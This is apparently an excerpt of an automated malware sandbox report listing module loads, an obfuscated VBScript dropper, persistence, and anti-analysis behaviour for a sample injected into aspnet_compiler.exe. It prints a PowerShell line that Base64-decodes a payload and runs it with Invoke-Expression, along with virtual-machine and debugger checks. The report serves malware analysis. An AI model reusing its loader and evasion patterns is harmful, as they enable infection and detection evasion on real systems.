Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                        Data Obfuscation

                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") Dim symcentry symcentry = "??????????????0I?????" hydrophobia = "??????????????0I?????po??????????????0I?????we??????????????0I?????rs??????????????0I?????hel??????????????0I?????l.e??????????????0I?????xe??????????????0I????? $??????????????0I?????concessionaries ??????????????0I?????= ??????????????0I?????'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'??????????????0I?????;??????????????0I?????$??????????????0I?????neurologically??????????????0I????? = ??????????????0I?????[S??????????????0I?????yst??????????????0I?????em??????????????0I?????.Tex??????????????0I?????t.E??????????????0I?????nc??????????????0I?????odi??????????????0I?????ng??????????????0I?????]??????????????0I?????:??????????????0I?????:
Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Code function: 21_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 21_2_0041BCE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Code function: 15_2_02EACA84 push es; retf 15_2_02EACA91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Code function: 21_2_004567E0 push eax; ret 21_2_004567FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Code function: 21_2_0045B9DD push esi; ret 21_2_0045B9E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Code function: 21_2_00455EAF push ecx; ret 21_2_00455EC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Code function: 21_2_00433FF6 push ecx; ret 21_2_00434009

                        Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe  File created: C:\ProgramData\haematachometer.vbs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Code function: 21_2_00406128 ShellExecuteW,URLDownloadToFileW, 21_2_00406128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Code function: 21_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 21_2_00419BC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Code function: 21_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 21_2_0041BCE3
Source: C:\Windows\System32\wscript.exe  Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0040E54F Sleep,ExitProcess,21_2_0040E54F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,21_2_004198C2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5483
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4372
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4172
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5631
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 5.1 %
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1484Thread sleep time: -13835058055282155s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep count: 4172 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep count: 5631 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep count: 37 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep time: -34126476536362649s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,21_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,21_2_0041B42F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,21_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0044D5E9 FindFirstFileExA,21_2_0044D5E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,21_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00406AC2 FindFirstFileW,FindNextFileW,21_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,21_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,21_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,21_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,21_2_00406F06
                        Source: wscript.exe, 0000000E.00000003.2514594580.00000230DFFF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: wscript.exe, 00000000.00000002.2177586636.0000014C48CE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175277697.0000014C48CE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
                        Source: wscript.exe, 00000000.00000002.2177586636.0000014C48CE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175277697.0000014C48CE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                        Source: wscript.exe, 00000000.00000002.2177586636.0000014C48D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174829728.0000014C48D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF731000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2524802447.00000230DF6A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF6A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2521837843.00000230DF731000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000F.00000002.2892055901.000000000102C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: wscript.exe, 0000000E.00000003.2524802447.00000230DF6A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF6A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
                        Source: aspnet_compiler.exe, 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                        Source: wscript.exe, 0000000E.00000003.2514594580.00000230DFFF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\J
                        Source: aspnet_compiler.exe, 0000000F.00000002.2892055901.000000000102C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWGO
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0043A65D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,21_2_0041BCE3
